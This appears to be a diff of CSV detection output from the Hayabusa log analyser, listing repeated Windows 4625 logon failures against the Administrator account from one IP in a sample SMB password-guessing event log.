+2016-09-20 01:51:35.402 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ulbcy5PWLYUm5Sy0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: L8rkZ7iBMam5o8VJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n39Zox0PFeNirzyT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3u3YUCKxEo5pnKJX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wen3pHM88kSRkHNf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dGDHJ4KMm2zEMV0b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lKZAB1nfXPYSLxsE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tYkOsX0XDpkdvp01  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.779 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: r9y7HjOeGPcrdj1c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.823 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RLwh8Lg3nvbm8Q2p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QoMkBcp8ouIgpX4m  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2UnrDiOAOec5DQGQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UxJGLShj5EDKLSDZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iWhaz8W0VLQdXKWN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 82YDxSIBnCAqdK4c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 795b7XqsxokIGJyM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1BmnyTsmP2XqMzf1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NB3xsYe3RcPXhDib  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yxN9i8exdO2h4oa7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vjcQaeuo4f8wFXhv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.351 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zCzr77BhliB4KKeb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Z558005RepKaO1zZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.448 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9HFzW25mJz4JLkv7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.490 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Y7J8m97GQWt2cbSs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XJrVwcpABBaZ8cyY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VcDw3I4BaFLdIeCZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: egEpV9aAuCFjwx2I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: th0ZLWF4YeOaNnkK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ahrOLfdy6DCQ9SfO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xiooSdP5eib8PUE3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: s6nQ2jp9IGYnGeyD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ejMtyR5QNdJFhw1W  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: e50kO0aVhfw5np5T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 176XyLw6IhEI6NuD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KXCzCSSFvpbWNJFd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XhHRuZYlH8hekaKc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZGIUBFRMQ3OBbOA0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: R7CTT5g1w58eRRlS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JmVccmad66uOK9ox  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.163 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: t1jlT6kEcs14dcNZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rBty5jOGkkZSZEyD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0Ci7YUsO5MtFkDSW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.347 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 12JToliq9mmAuMTQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lw9AgAvBGWoXBlim  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ReGDyvRpGknAKqqB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6mdUn8na4asRfpJP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b7Wm5p4HnNCbkyh2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MQZwerVd6E08X8Ou  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dbDjtLKoX5Q77bn5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O7BNKHiPjzJKCaDk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.714 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HHqBI8bzZn5VO9gq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xz2ZO3b3QSh6Rdqt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IEfdhrwbTfCpCXKC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kc0LuQzAmQTIF1X3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WMZ70YmzpVp2h8mY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FFVr3Amq6mA3umiu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:37.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hnN15vqZcww8pqTK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.027 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sSuMRF1txQ9g2Mwi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tUuapChhs4CGO1cS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dIMr0hjIkwD8AaEG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8ww9HMQX0cqmolYQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XJRRZ5e9lARVZDar  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VvUzVoSLqFPAXSWE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SMMgPu1VJIjAWPDW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I1JjIa4nOKDTLuAD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0J0GJIm1UUXHH9QJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YmVX3xIz0hrQFvPr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nv4tKFEmHjiXkVDI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: esdHHJl9LBek9pIo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MWofwwLjwiyBk39P  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dvsHFZe7Z1uJ9Dkv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8aDdgwvb1zsZF79k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
